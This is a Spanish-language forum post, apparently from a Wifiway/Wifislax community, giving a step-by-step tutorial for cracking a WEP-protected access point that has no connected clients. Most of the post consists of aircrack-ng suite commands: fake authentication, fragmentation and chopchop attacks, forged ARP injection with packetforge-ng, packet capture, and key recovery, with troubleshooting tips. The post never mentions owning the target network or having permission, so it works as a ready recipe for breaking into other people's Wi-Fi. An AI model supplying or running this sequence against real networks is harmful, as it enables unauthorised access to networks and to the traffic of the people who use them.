Antes que nada gracias a los que han puesto tiempo en darle soporte a wifi way wifislax y de alguna forma contribulleron a los manuales hallados en estos foros.
Los manuales estan muy buenos pero en mi caso ocurrio algo interesante que me hizo la vida imposible al intentar conseguir un WEP key: no habian clientes conectados y aun con la falsa autenticacion no subian los ARP. Pongo esto aqui por si alguien le ocurre lo mismo. Lo que pongo a continuacion es una aplicacion/remix del conocimiento posteado aqui y otras web y para algunos os parecera obvio; pero tiene algunos pasos extra para los que tengan mi problema de falta de injeccion. Mi OS es WIN XP y uso live CD. Asumo que el AP tiene WEP open y vosotros usuais tarjeta wifi ipw3945 :-P.
Primeramente, utilize la version 0.4 de wifiway. la 0.6 salio JUSTO cuando acababa de bajar la 0.4 se me acabaron los discos en blanco para colmo>.>
NOTA:yo me mate buscando info por ahi y luego me entero que en esta live CD NO HAY QUE PONER LA TARJETA EN MODO MONITOR. Se hace automaticamente.
En la version 0.6 imagino que los primeros 3 pasos no se necesitan(excepto poner el live cd DUH :-P).
I. Desde windows correr netstumbler. Es super rapido y dummy friendly para hallar AP's y BSSID's. Es mi preferencia, si no os gusta usad lo que querais y pasad trabajo :-).
II. Poner ipw3945.sh en el directorio raiz, usualmente C. Poner live CD y dar restart.
III. Una vez en linux abrir el explorador de archivos y buscar el folder /mnt/ y una de esas va a ser la particion de windows. Dar copy al ipw3945.sh y paste en /root.
->NOTA: talvez muchos sepan esto pero yo no hasta hace un dia, asi que aqui os va: en el folder /mnt/ pueden haber varias particiones (incluyendo USB drives me imagino). En mi caso puedo dar copy a cosas de windows pero no puedo paste cosas de linux a esa particion. Si han comenzado el proceso de obtener IV's y se han quedado a mitad pueden darle copy a los .cap y .ivs y otras cosas que hayan creado en linux a uno de esas particiones. Ademas pueden grabar desde windows los tutoriales con "save as web page," abrir firefox, arrastralos a la ventana y verlos desde linux.
IV. Abrir un terminal y escribir chmod 777 ipw3945.sh <dar enter> luego escriba ./ipw3945.sh y ponga la info que le pida.
V. Escriba en la consola:
aireplay-ng -1 0 -e NOMBRE_DEL_AP -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
O si esto no trabaja bien
aireplay-ng -1 6000 -o 1 -q 10 -e NOMBRE_DEL_AP -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
-Vuestro MAC se consigue escribiendo en un terminal /ifconfig -a
-Este ataque puede fallar de la primera asi que intente varias veces. En mi caso falla si hay un cliente externo conectado. Aveces un buen reboot a tu maquina ayuda si no funciona.
VI. en otra consola:
airodump-ng -w --ivs cap rtap0
-Cap es el nombre que prefieran para guardar data capturada
VII. en otra consola:
aireplay-ng -3 -b MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
Con solo esto puede que le injecte. Ese no fue mi caso asi por eso viene lo siguiente:
VIII. Este paso puede ser hecho de la forma A o B. Aun con el mismo AP aveces funciona el A aveces el B. Usad uno de los dos si AL FINAL no trabaja, dar reboot y use el otro(el reboot es pq despues del procedimiento los drivers aveces no responden como uno quiere y no ataca bien) :
A. En otra consola:
aireplay-ng -5 -b MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA wifi0
-ESPERE un par de minutos a que esto termine. Escriba Y (de yes) al la pregunta que le van a hacer y espere a que cree un archivo .xor ->Apunte el nombre
B. En otra consola EN LUGAR del paso A:
aireplay-ng -4 wifi0 -h MAC_DE_VUESTRA TARRJETA
-este ataque aveces no funciona con el -h. Usted experimente.
-ESPERE un par de minutos a que esto termine. Escriba Y (de yes) al la pregunta que le van a hacer y espere a que cree un archivo .xor ->Apunte el nombre
>Anotar de estos pasos nombre de archivo con nombres de este tipo: replayX.cap la parte de X usualmente es un numero. Sustituyalo por el que aplique a su caso
>Una ALTERNATIVA al VIIIB si ya tiene un archivo replay*.cap de una ocacion anterior es
aireplay-ng -4 wifi0 -h MAC_DE_VUESTRA TARRJETA -r replayX.cap
-donde X son unos numeros. Sustituyalo de acuerdo a su caso.
IX. en otra consola:
packetforge-ng -0 -a MAC_DEL_AP -h MAC_DE_VUESTRA TARRJETA -k 255.255.255.255 -l 255.255.255.255 -y fragmentX.xor arpZ
>la x puede ser cualquier cosa fijarse en los archivos creados por el paso anterior
> esto es una L minuscula no e confundan-l
> arpZ puede ser lo que quieran, pero no olviden el nombre
>los ip que se muestran NO LOS CAMBIEN; la mayoria de los AP no tienen problema con ellos
X. Presionar las teclas ctrl C en la consola que tiene corriendo al airodump(amenos que usted vea que le esta injectando pero los dudo). Ejecute este nuevo comando:
airodump-ng -c X -bssid MAC_DEL_AP --ivs -w capture rtap0
>el nombre capture lo escojen ustedes pero capture suena bien
XI. En otra consola (use la que corri el ataque -1, que estaba abierta) escriba:
aireplay-ng -2 -r arpZ TARRJETA wifi0
>la ventana del paso VII debe estar mostrando como suben los ARP, en mi caso promedio de 400 data/segundo :-D, si no es asi recomiendodar reboot e intentar denuevo sustituyendo el paso VIII A por el B o viceversa o tratar luego. Esto a mi NO me funciona si hay algun cliente conectado aparte del fake auth del ataque -1. Un ataque -0 os puede da~ar el procedimiento asi que no lo hagais :-P.
XII. ejecuten en otra consola:
aircrack-ng *.cap X.ivs -b MAC_DEL_AP
> -b MAC_DEL_AP no es necesariopero aveces no me funciona sin el :-S
>la parte de *.cap la poneis tal como esta con el * per el X.ivs depende del el o los archivos que crearonen los pasos anteriores. Ademas el sistema cambia los nombres, usualmente capture se va a llamar capture-01.ivs o algo asi. Por eso recomiendo ir al /root y ver todos los archivos nombrados <lo que sea>.IVS y a~adirlo al codigo en lugar de X.ivs. Cabe notar que si hay mas de 1 pueden poner todos losque quieran ej X.ivs y.ivs z.ivs pero no acepta *.ivs a diferencia del *.cap que si lo acepta
>si han hecho todo bien al aircrack le deben estar subiendo los IV a monton, asi que esperad, Yo necesite 700,000 IV's y el WEP key era solo de 64 bit y tardo 10 minutos en colectarlos, asi que no se desesperen.